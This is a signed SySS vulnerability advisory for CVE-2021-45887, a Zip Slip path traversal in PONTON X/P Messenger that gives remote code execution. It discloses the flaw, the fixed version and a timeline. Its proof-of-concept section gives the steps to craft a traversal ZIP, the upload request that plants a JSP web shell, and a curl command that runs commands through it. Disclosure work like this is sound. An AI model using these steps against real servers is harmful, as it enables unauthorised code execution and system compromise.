CVE-2021-45887

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-077 Product: PONTON X/P Messenger Manufacturer: PONTON GmbH Affected Version(s): 3.8.0 (Build 201909201204), 3.10.0 (Build 202009171429) Tested Version(s): 3.8.0 (Build 201909201204), 3.10.0 (Build 202009171429) Vulnerability Type: Zip Slip, arbitrary file write through path traversal (CWE-22) Remote code execution through web shell (CWE-434) Risk Level: Medium Solution Status: Fixed in release of version 3.11.2 Manufacturer Notification: 2022-01-25 Solution Date: 2022-02-07 Public Disclosure: 2022-03-11 CVE Reference: CVE-2021-45887 Author of Advisory: Stefan Walter, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The manufacturer describes the product as follows (see [1]): > The PONTON X/P Messenger (or PONTON X/P for short) is PONTON’s > high-quality B2B integration solution with a proven track-record in > several industries since 2001. PONTON X/P is a highly configurable > ebXML, AS/1, AS/2, AS/3 and AS/4 compliant messaging software. It > provides additional features to deal with typical B2B integration > issues (such as a listener component for the DMZ, certificate > management and non-repudiation of messages). PONTON X/P is typically > used as communication layer in a business consortium or as an (OEM) > communication extension of an existing software application. Due to a path traversal in uploaded ZIP files, a web shell can be uploaded by web application administrators, giving the attacker remote code execution on the underlying server. The tested version was not the most recent one. The current versions 4.X were not affected. The vulnerability can only be exploited by authorisation with a user of the Ponton X/P web UI which is normally only accessible on the internal network. The vulnerability is fixed with Ponton X/P Version 3.11.2. Please upgrade to the Version 3.11.2. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Different endpoints of the web application allow uploading of files. The upload functionalities are generally reachable only by users with the role “Configuration Administrator” or “Administrator". One upload is available at Configuration -> Schemata -> Schema Set Upload. This form accepts a ZIP file and extracts all contents into the local file system under the installation folder at config/Schemata/. By manually modifying the file name entry in the uploaded ZIP file, a path traversal can be exploited (so-called “Zip Slip” attack [2]). For testing purposes, a local installation was set up using the application binaries provided at [3] and the instructions at [4]: $ wget ‘https://www.ponton.de/downloads/xp/3.10/PontonXP-Messenger-3.10.0-Linux.zip’ $ unzip PontonXP-Messenger-3.10.0-Linux.zip -d PontonXP-Messenger-3.10.0-Linux $ cd PontonXP-Messenger-3.10.0-Linux $ ./pontonxp start Afterwards, the web application is reachable at https://localhost:8443. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following listing shows how a malicious ZIP can be crafted. $ cat aaaaaaaaaaaaaaaaaa_shell.jsp <%@ page import="java.util.*,java.io.*"%> <% … $ zip shell.zip aaaaaaaaaaaaaaaaaa_shell.jsp adding: aaaaaaaaaaaaaaaaaa_shell.jsp (deflated 45%) $ sed -i ‘s|aaaaaaaaaaaaaaaaaa_|…/…/webroot/imgs/|g’ shell.zip $ hexdump -C shell.zip 00000000 50 4b 03 04 14 00 00 00 08 00 80 50 94 53 ce 0c |PK…P.S…| 00000010 22 c5 2e 01 00 00 26 02 00 00 1c 00 1c 00 2e 2e |"…&…| 00000020 2f 2e 2e 2f 77 65 62 72 6f 6f 74 2f 69 6d 67 73 |/…/webroot/imgs| 00000030 2f 73 68 65 6c 6c 2e 6a 73 70 55 54 09 00 03 00 |/shell.jspUT…| 00000040 47 c0 61 35 47 c0 61 75 78 0b 00 01 04 e8 03 00 |G.a5G.aux…| 00000050 00 04 e8 03 00 00 8d 91 51 4b 03 31 0c c7 df fb |…QK.1…| 00000060 29 62 61 d0 9b 5a 11 f5 41 b6 89 30 5f 84 c1 64 |)ba…Z…A…0_…d| 00000070 83 e1 6b d9 65 b3 72 d7 d6 36 b7 db 90 7d 77 d3 |…k.e.r…6…}w.| 00000080 63 c3 21 88 f6 a5 21 ff 5f fe 09 c9 b0 f7 08 c1 |c.!..!._…| 00000090 ac 11 6c 1d 7c a4 91 7c 37 1b a3 1b b2 95 ee 5f |…l.|…|7…_| 000000a0 74 b1 f5 ba 2f 7b 0f 62 d8 13 73 8a d6 ad 99 8f |t…/{.b…s…| 000000b0 a6 86 11 c8 bb 57 bb 2a 67 f7 9b f9 6d 79 b3 90 |…W.*g…my…| 000000c0 03 f1 12 fd 12 53 82 30 10 76 05 6a be 4b 84 b5 |…S.0.v.j.K…| 000000d0 5e 23 b1 10 30 d2 4e 49 9f b4 33 35 ca 42 93 9f |^#…0.NI…35.B…| 000000e0 f8 16 e3 d8 24 54 85 b6 ae c4 ed 74 a5 64 cb 91 |…$T…t.d…| 000000f0 6f 93 2c e0 6c 04 97 d7 05 7c 0a e0 17 b8 df ac |o.,.l…|…| 00000100 71 64 6b cc 86 87 90 0b 71 8b 4b 25 97 75 99 23 |qdk…q.K%.u.#| 00000110 b8 1a 83 84 73 88 f8 d1 60 a2 ae 75 1e 16 09 a3 |…s…`…u…| 00000120 ea c6 2e 8a 81 d8 03 56 09 ff 65 fc 87 91 98 36 |…V…e…6| 00000130 14 1a e2 bd 20 6f c4 27 f6 0a 99 3d 4d 2b 06 9f |… o.’…=M+…| 00000140 dd 37 65 dd 91 3a c9 66 e8 c9 90 39 05 4b 9b fd |.7e…:.f…9.K…| 00000150 1c b6 f0 43 51 d6 31 7e 38 06 53 15 63 fc 69 d6 |…CQ.1~8.S.c.i.| 00000160 ca 89 75 98 cd da 37 5b 21 a8 4e e5 45 ba a6 aa |…u…7[!.N.E…| 00000170 8e ab f4 0d e9 c0 b5 54 b9 4e 67 3a a7 7f 31 da |…T.Ng:…1.| 00000180 0b be fd 17 50 4b 01 02 1e 03 14 00 00 00 08 00 |…PK…| 00000190 80 50 94 53 ce 0c 22 c5 2e 01 00 00 26 02 00 00 |.P.S…"…&…| 000001a0 1c 00 18 00 00 00 00 00 01 00 00 00 a4 81 00 00 |…| 000001b0 00 00 2e 2e 2f 2e 2e 2f 77 65 62 72 6f 6f 74 2f |…/…/webroot/| 000001c0 69 6d 67 73 2f 73 68 65 6c 6c 2e 6a 73 70 55 54 |imgs/shell.jspUT| 000001d0 05 00 03 00 47 c0 61 75 78 0b 00 01 04 e8 03 00 |…G.aux…| 000001e0 00 04 e8 03 00 00 50 4b 05 06 00 00 00 00 01 00 |…PK…| 000001f0 01 00 62 00 00 00 84 01 00 00 00 00 |…b…| 000001fc Uploading this file places a JSP web shell into the web application’s web root. The resulting request is shown in the following listing (the actual ZIP was omitted due to the binary data it contains): POST /pontonxp/private/SchemaSetUpload.do HTTP/1.1 Host: localhost:8443 Cookie: SESSIONID8443=node019bxzmhhs2k911xjshmqsrk1tt3.node0; clickedFolder=F890761339%5EF118222018%5E Content-Type: multipart/form-data; boundary=---------------------------137950995713224342382087625694 Content-Length: 1117 … -----------------------------137950995713224342382087625694 Content-Disposition: form-data; name="csrfToken” 066d7ed9-de08-4f26-ac08-a0c63167afc6 -----------------------------137950995713224342382087625694 Content-Disposition: form-data; name="schemaSetFile"; filename="shell.zip" Content-Type: application/zip … -----------------------------137950995713224342382087625694 Content-Disposition: form-data; name="ok.x" 31 -----------------------------137950995713224342382087625694 Content-Disposition: form-data; name="ok.y" 2 -----------------------------137950995713224342382087625694-- This shell is then publicly retrievable without authentication at https://localhost:8443/pontonxp/imgs/shell.jsp. Commands can be executed as follows: $ curl -k https://localhost:8443/pontonxp/imgs/shell.jsp?5XifdR9vS4d3V=id uid=1000(demo) gid=1000(demo) groups=1000(demo),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(bluetooth),134(scanner),144(kaboxer) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The vulnerability has been fixed with Ponton X/P version 3.11.2. More information: https://www.ponton.de/downloads/xp/3.11/documents/ReleaseNotes3112.pdf ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-12-06: Vulnerability discovered 2022-01-25: Vulnerability reported to manufacturer 2022-02-07: Fixed version 3.11.2 released by manufacturer 2022-03-11: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for PONTON X/P MESSENGER https://www.ponton.de/products/xpmessenger/ [2] https://snyk.io/research/zip-slip-vulnerability [3] PONTON X/P MESSENGER 3.10.0 download https://ponton.de/downloads/xp/3.10/PontonXP-Messenger-3.10.0-Linux.zip [4] PONTON X/P MESSENGER 3.10.0 documentation https://ponton.de/downloads/xp/3.10/documents/MessengerDocumentation310.pdf [5] SySS Security Advisory SYSS-2021-077 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-077.txt [6] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This security vulnerability was found by Stefan Walter of SySS GmbH. E-Mail: [email protected] Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Walter.asc Key Fingerprint: 74DD 77CD 0317 2777 470D 38BE BE0B B311 DA3F 3E16 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEdN13zQMXJ3dHDTi+vguzEdo/PhYFAmIogvoACgkQvguzEdo/ Pha5jA/+JbDv1gvUn+7qoc1xkNTKkDStL5uf13VKad6eVwAjtD0SZ6UqLwPqqYR/ H+w/Y62muAtTI97ArmJJL/7oignqTctNUn1uysngNUs5LP+KejxAkMdbBTzIUvMB oOoDtWBIQ/a65U7R6ImbM8H24BkTXQlG9/vShpduJetMIPBl2oMKaLE3Tp1E1O3I eZFIvbLE6kCqj892j+GXElj7ma2vg8mSB/v4O/Qk+FsjJeKZ7mEGNj/Fwf+xnkIj wLBkaenHxj+3FwFrnUC7z8i+dto5NzgeQZ9Zd4yij1S3Gkma7KQqhX5eGwpBwqJQ u2uHBYweiBrHYzy6AmV1gS+IWQommgmaQ1Mm6fHChX2LF6i86dOMKTH527/UAnG+ lprFhUEUvA+v4SyVPlinW3AczwmsoLZfiLFUTgPO8Yp+A34euL2u82ARcSxZ38B9 pPOI4fl/evlIxq6hS8n9noedUTN4eSgJJOVcYzF+7s8PoELtwkSilJuHFpFY/RC4 hvLBULwHdxUjHa95gn5hEt41ccCeTHutpQ9Jqih7VoetNAzpWbucnySkg3S8H3ga 3kbLAu6/Z+QnuQ57gvjBPi9EaV84cGnSpsH3YZ6HXzq7nuP7auqIfooINX+mp1aZ kgEXnm4O7ObLF0gDmq2HCigRz0WdYvFY3Z33S8j5HM5Nxl8a2eI= =nSXc -----END PGP SIGNATURE-----